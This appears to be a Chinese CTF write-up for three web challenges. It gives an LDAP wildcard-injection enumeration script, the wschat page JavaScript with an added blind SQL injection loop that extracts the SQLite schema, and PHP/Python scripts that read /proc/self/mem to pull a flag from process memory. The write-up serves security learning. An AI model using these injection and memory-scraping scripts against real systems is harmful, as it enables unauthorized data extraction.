easyinject 是一个注入题,但是好像没有发现注入点,fuzz后发现在用户名字段输入括号会有warning回显到前端,发现是使用了ldap协议。
LDAP(Lightweight Directory Access Protocol):轻量级目录访问协议,是一种在线目录访问协议,主要用于目录中资源的搜索和查询。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 import requestsurl = '{}&pass=1' r = requests.get(url) dic = "qwertyuiopasdfghjklzxcvbnm1234567890_" def dfs (payload ): for i in dic: nowpayload = payload + i r = requests.get(url.format (nowpayload + '*' )) if "密码错误" in r.text or "用户不唯一" in r.text: print (nowpayload) dfs(nowpayload) dfs('' )
wschat 零解题,知识点特别简单:前端绕过+sql注入,没了,但之所以是零解题,那必然是有自己的恶心之处。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 (function ( ) { const gotoNewOfflinePage = function ( ) { let y$$ = true ; return function (R, create ) { const voronoi = y$$ ? function ( ) { if (create) { const fn3 = create["apply" ](R, arguments ); return create = null , fn3; } } : function ( ) { }; return y$$ = false , voronoi; }; }(); (function ( ) { gotoNewOfflinePage(this , function ( ) { const PL$37 = new RegExp ("function *\\( *\\)" ); const PL$26 = new RegExp ("\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)" , "i" ); const PL$36 = _0x6c017f("init" ); if (!PL$37. test(PL$36 + "chain" ) || !PL$26. test(PL$36 + "input" )) { PL$36 ("0" ); } else { _0x6c017f(); } })(); })(); const result = { "isOpen" : false , "orientation" : undefined }; const _0x14edab = 160 ; const emitEvent = (button, value ) => { window .dispatchEvent(new CustomEvent("devtoolschange" , { "detail" : { "isOpen" : button, "orientation" : value } })); }; const load = ({ emitEvents : fromSubmit = true } = {} ) => { const orientation = window .outerWidth - window .innerWidth > _0x14edab; const _0x4ca755 = window .outerHeight - window .innerHeight > _0x14edab; const y = orientation ? "vertical" : "horizontal" ; if (!(_0x4ca755 && orientation) && (window ["Firebug" ] && window ["Firebug" ]["chrome" ] && window ["Firebug" ]["chrome" ]["isInitialized" ] || orientation || _0x4ca755)) { if ((!result["isOpen" ] || result["orientation" ] !== y) && fromSubmit) { emitEvent(true , y); } result["isOpen" ] = true ; result["orientation" ] = y; } else { if (result["isOpen" ] && fromSubmit) { emitEvent(false , undefined ); } result["isOpen" ] = false ; result["orientation" ] = undefined ; } }; load({ "emitEvents" : false }); if (typeof module !== "undefined" && module ["exports" ]) { module ["exports" ] = result; } else { window ["devtools" ] = result; } })(); window ["addEventListener" ]("devtoolschange" , (err ) => { document ["documentElement" ]["innerHTML" ] = "Hacker!<br>" ; }); let sock = io.connect("ws://" + window .location.host + "/" );var WSMessage;var wsmessage;var buffer;protobuf.load("chat.proto" , function (err, def ) { if (err) { throw err; } LoginReq = def.lookup("wschat.chat.LoginReq" ); RegReq = def.lookup("wschat.chat.RegReq" ); ServerRsp = def.lookup("wschat.chat.ServerRsp" ); MsgReq = def.lookup("wschat.chat.MsgReq" ); LogoutReq = def.lookup("wschat.chat.LogoutReq" ); }), window .onload = function ( ) { let fn = "" ; let htmlAttributes = document .getElementByld("btn1" ); let attributes = document .getElementByld("btn2" ); let data_layer = document .getElementByld("btn_send" ); let list = document .getElementByld("user" ); let item = document .getElementByld("pass" ); let result = document .getElementByld("txt1" ); let hl = document .getElementByld("ul1" ); htmlAttributes.onclick = function ( ) { var buffer = RegReq.create({ "username" : list["value" ], "password" : item["value" ] }); var labels = RegReq.encode(buffer).finish(); sock.emit("reg" , labels.slice()["buffer" ]); }; sock.on("reg_ret" , (err, bbls ) => { if (err) { alert(bbls); } else { alert(bbls); } }); attributes.onclick = function ( ) { var buffer = LoginReq.create({ "username" : list["value" ], "password" : item["value" ] }); var labels = LoginReq.encode(buffer).finish(); sock.emit("login" , labels.slice()["buffer" ]); }; sock.on("login_ret" , (err, bbls ) => { if (err) { alert(bbls); } else { fn = list["value" ]; alert(bbls); } }); data_layer.onclick = function ( ) { var buffer = MsgReq.create({ "msg" : result["value" ] }); var labels = MsgReq.encode(buffer).finish(); sock.emit("msg" , labels.slice()["buffer" ]); }; sock.on("msg" , (err, isSlidingUp ) => { let node = document .createElement("li" ); node.innerHTML = "<h3>" + err + "</h3><p>" + isSlidingUp + "</p>" ; hl.appendChild(node); }); sock.on("msg_ret" , (err, theLibrary ) => { if (err) { alert("发送失败:" + theLibrary); } else { let node = document .createElement("li" ); node.className = "mine" ; node.innerHTML = "<h3>" + fn + "</h3><p>" + result["value" ] + "</p>" ; hl.appendChild(node); result["value" ] = "" ; } }); }, setInterval (function ( ) { _0x6c017f(); }, 4E3 ); function _0x6c017f (event ) { function next (i ) { next(++i); } try { if (event) { return next; } else { next(0 ); } } catch (_0xf40179) { } }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 <!DOCTYPE html > <html > <head > <meta charset ="utf-8" /> <meta http-equiv ="X-UA-Compatible" content ="IE=edge" > <title > 聊天室</title > <meta name ="viewport" content ="width=device-width, initial-scale=1" > <script src ="//cdn.bootcss.com/socket.io/2.1.1/socket.io.js" > </script > <script src ="protobuf.min.js" > </script > <style > .mine { color :green; } Body {background :url (bg.webp ); background-repeat :no-repeat; background-size :100% ; } input { background-color : transparent; } textarea { background-color : transparent; } </style > </head > <body > 用户名:<input type ="text" id ="user" /> <br > 密 码:<input type ="password" id ="pass" > <br > <input type ="button" value ="注册" id ="btn1" > <input type ="button" value ="登录" id ="btn2" > <hr > <textarea name ="" id ="txt1" cols ="80" rows ="10" > </textarea > <input type ="button" value ="发送" id ="btn_send" > <ul id ="ul1" > </ul > <script > (function ( ) { const _0x476866 = function ( ) { let _0x4bb9fc = !![]; return function (_0x58c9dc, _0x4b0a21 ) { const _0xf76523 = _0x4bb9fc ? function ( ) { if (_0x4b0a21) { const _0x635e3f = _0x4b0a21['apply' ](_0x58c9dc, arguments ); return _0x4b0a21 = null , _0x635e3f; } } : function ( ) { }; return _0x4bb9fc = ![], _0xf76523; }; }(); (function ( ) { _0x476866(this , function ( ) { const _0x22f222 = new RegExp ('function\x20*\x5c(\x20*\x5c)' ), _0x28c056 = new RegExp ('\x5c+\x5c+\x20*(?:[a-zA-Z_$][0-9a-zA-Z_$]*)' , 'i' ), _0x5d5775 = _0x6c017f('init' ); !_0x22f222['test' ](_0x5d5775 + 'chain' ) || !_0x28c056['test' ](_0x5d5775 + 'input' ) ? _0x5d5775('0' ) : _0x6c017f(); })(); }()); 'use strict' ; const _0x2fe348 = { 'isOpen' : ![], 'orientation' : undefined }, _0x14edab = 0xa0 , _0x3b75b5 = (_0x231b41, _0x547b1f ) => { window ['dispatchEvent' ](new CustomEvent('devtoolschange' , { 'detail' : { 'isOpen' : _0x231b41, 'orientation' : _0x547b1f } })); }, _0x572096 = ({ emitEvents: emitEvents = !![] } = {} ) => { const _0x112831 = window ['outerWidth' ] - window ['innerWidth' ] > _0x14edab, _0x4ca755 = window ['outerHeight' ] - window ['innerHeight' ] > _0x14edab, _0x80c7cf = _0x112831 ? 'vertical' : 'horizontal' ; !(_0x4ca755 && _0x112831) && (window ['Firebug' ] && window ['Firebug' ]['chrome' ] && window ['Firebug' ]['chrome' ]['isInitialized' ] || _0x112831 || _0x4ca755) ? ((!_0x2fe348['isOpen' ] || _0x2fe348['orientation' ] !== _0x80c7cf) && emitEvents && _0x3b75b5(!![], _0x80c7cf), _0x2fe348['isOpen' ] = !![], _0x2fe348['orientation' ] = _0x80c7cf) : (_0x2fe348['isOpen' ] && emitEvents && _0x3b75b5(![], undefined ), _0x2fe348['isOpen' ] = ![], _0x2fe348['orientation' ] = undefined ); }; _0x572096({ 'emitEvents' : ![] }), typeof module !== 'undefined' && module ['exports' ] ? module ['exports' ] = _0x2fe348 : window ['devtools' ] = _0x2fe348; }()); let sock = io['connect' ]('ws://' + window ['location' ]['host' ] + '/' );var WSMessage, wsmessage, buffer;protobuf['load' ]('chat.proto' , function (_0x1e8bc6, _0x75e501 ) { if (_0x1e8bc6) throw _0x1e8bc6; LoginReq = _0x75e501['lookup' ]('wschat.chat.LoginReq' ), RegReq = _0x75e501['lookup' ]('wschat.chat.RegReq' ), ServerRsp = _0x75e501['lookup' ]('wschat.chat.ServerRsp' ), MsgReq = _0x75e501['lookup' ]('wschat.chat.MsgReq' ), LogoutReq = _0x75e501['lookup' ]('wschat.chat.LogoutReq' ); }), window ['onload' ] = function ( ) { let _0x1f4215 = '' , _0x1139cf = document ['getElementById' ]('btn1' ), _0x2af11b = document ['getElementById' ]('btn2' ), _0x413d89 = document ['getElementById' ]('btn_send' ), _0x29d952 = document ['getElementById' ]('user' ), _0x22dda2 = document ['getElementById' ]('pass' ), _0x2c48a5 = document ['getElementById' ]('txt1' ), _0x5900fb = document ['getElementById' ]('ul1' ); _0x1139cf['onclick' ] = function ( ) { var _0x3689c9 = RegReq['create' ]({ 'username' : _0x29d952['value' ], 'password' : _0x22dda2['value' ] }), _0x38c60d = RegReq['encode' ](_0x3689c9)['finish' ](); sock['emit' ]('reg' , _0x38c60d['slice' ]()['buffer' ]); }, sock['on' ]('reg_ret' , (_0x77442, _0x4d8078 ) => { _0x77442 ? alert(_0x4d8078) : alert(_0x4d8078); }), _0x2af11b['onclick' ] = function ( ) { var _0xea8ad4 = LoginReq['create' ]({ 'username' : _0x29d952['value' ], 'password' : _0x22dda2['value' ] }), _0x581e63 = LoginReq['encode' ](_0xea8ad4)['finish' ](); sock['emit' ]('login' , _0x581e63['slice' ]()['buffer' ]); }, sock['on' ]('login_ret' , (_0x253784, _0x4ca143 ) => { _0x253784 ? alert(_0x4ca143) : (_0x1f4215 = _0x29d952['value' ], alert(_0x4ca143));alert(_0x4ca143.indexOf("成功" ) != -1 ); }), _0x413d89['onclick' ] = function ( ) { var _0x254c70 = MsgReq['create' ]({ 'msg' : _0x2c48a5['value' ] }), _0x56ebdb = MsgReq['encode' ](_0x254c70)['finish' ](); sock['emit' ]('msg' , _0x56ebdb['slice' ]()['buffer' ]); }, sock['on' ]('msg' , (_0x2378cb, _0x4ce8f4 ) => { let _0x3ca130 = document ['createElement' ]('li' ); _0x3ca130['innerHTML' ] = '<h3>' + _0x2378cb + '</h3><p>' + _0x4ce8f4 + '</p>' , _0x5900fb['appendChild' ](_0x3ca130); }), sock['on' ]('msg_ret' , (_0x491ba1, _0x25dec1 ) => { if (_0x491ba1) alert('发送失败:' + _0x25dec1); else { let _0x4a7033 = document ['createElement' ]('li' ); _0x4a7033['className' ] = 'mine' , _0x4a7033['innerHTML' ] = '<h3>' + _0x1f4215 + '</h3><p>' + _0x2c48a5['value' ] + '</p>' , _0x5900fb['appendChild' ](_0x4a7033), _0x2c48a5['value' ] = '' ; } }); }, setInterval (function ( ) { _0x6c017f(); }, 0xfa0 ); function _0x6c017f (_0x19de66 ) { function _0x2ed5ce (_0x255d4e ) { } try { if (_0x19de66) return _0x2ed5ce; else _0x2ed5ce(0x0 ); } catch (_0xf40179) { } } </script > </body > </html >
(在Map to local path部分修改为本地文件,这样在经过代理,到我们浏览器的环境都是我经过patch的js了。)
然后就到了第三部分,提示里说了sqli me,显然是一个sql注入了,hint里说了是用sqlite的数据库,
elegant-crazy师傅是用python调了protobuf库,实现的盲注,所有的sock事件全要自己手写一遍,很是累, 我寻思着在js里人家都写好了,我直接在js部分添加了盲注的部分就好了:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 sock['on' ]('login_ret' , (_0x253784, _0x4ca143 ) => { _0x253784 ? ( console .log(_0x4ca143), returned = (_0x4ca143.indexOf("成功" ) != -1 ), locked = true ) : ( _0x1f4215 = _0x29d952['value' ], returned = (_0x4ca143.indexOf("成功" ) != -1 ), locked = true , console .log(_0x4ca143)); }); var ans = "" ; var flag = false ; for (let i = 1 ; i < 5 ; i++) { flag = false ; let low = 32 ; let high = 128 ; let mid = (low+high )/ 2 let midchar = String .fromCharCode(mid); while (low<high){ let payload = "admin' and substr((select hex(group_concat(sql)) from sqlite_master)," + i + ",1)>'" + midchar + "';" ; var buffer = LoginReq['create' ]({ "username" : payload, "password" : "123" }); console .log(payload); var _0x581e63 = LoginReq['encode' ](buffer)['finish' ](); sock['emit' ]('login' , _0x581e63['slice' ]()['buffer' ]); for (let j = 1 ; j < 1000000000 ; j++){} locked = false ; console .log(returned); if (returned === false ){ low = mid + 1 ; } else { high = mid; } mid = Math .floor((low+high) / 2 ); if (mid === 32 || mid === 127 ){flag = true ; break ;} midchar = String .fromCharCode(mid); console .log(mid); } ans = ans + midchar; console .log(ans); } console .log(ans);
hideandseek 和web没有啥关系,和二进制全是关系。
1 2 3 4 5 6 7 8 FROM php:8.1 .0 ADD ./src /var/www/html ADD ./flag /flag WORKDIR /var/www/html/ RUN chmod -R 0555 /var/www/html/ CMD ["php" , "-S" , "" , "-t" , "/var/www/html" ]
,是一个ELF文件,但可惜strings ./exe
1 cat mem: Input/output error
显示$pid 内存的内容与进程中的映射方式相同,即伪文件中偏移x 处的字节与进程中地址x 处的字节相同。如果在进程中未映射地址,则从文件中的相应偏移量读取返回EIO
指针会完全失败,而不是无意中访问实际内存),因此读取 的第一个字节/proc/$pid/mem
总是会产生 I/O 错误。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 import remaps_file = open ("/proc/self/maps" , 'r' ) mem_file = open ("/proc/self/mem" , 'rb' , 0 ) output_file = open ("self.dump" , 'wb' ) for line in maps_file.readlines(): m = re.match(r'([0-9A-Fa-f]+)-([0-9A-Fa-f]+) ([-r])' , line) if m.group(3 ) == 'r' : start = int (m.group(1 ), 16 ) end = int (m.group(2 ), 16 ) mem_file.seek(start) chunk = mem_file.read(end - start) output_file.write(chunk) maps_file.close() mem_file.close() output_file.close()
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 <?php $maps_file = fopen("/proc/self/maps" , "r" );$mem_file = fopen("/proc/self/mem" , "rb" );while (! feof($maps_file )) { $line = fgets($maps_file ); $m = preg_match("/([0-9A-Fa-f]+)-([0-9A-Fa-f]+) ([-r])/" , $line , $match ); if ($match [3 ] == 'r' ) { $start = hexdec($match [1 ]); $end = hexdec($match [2 ]); fseek($mem_file , $start ); $chunk = fread($mem_file , $end - $start ); if (preg_match("/flag\{.*\}/" , $chunk )) { preg_match("/(flag\{.*\})/" , $chunk , $ans ); var_dump($ans ); } } } fclose($maps_file ); fclose($mem_file ); ?>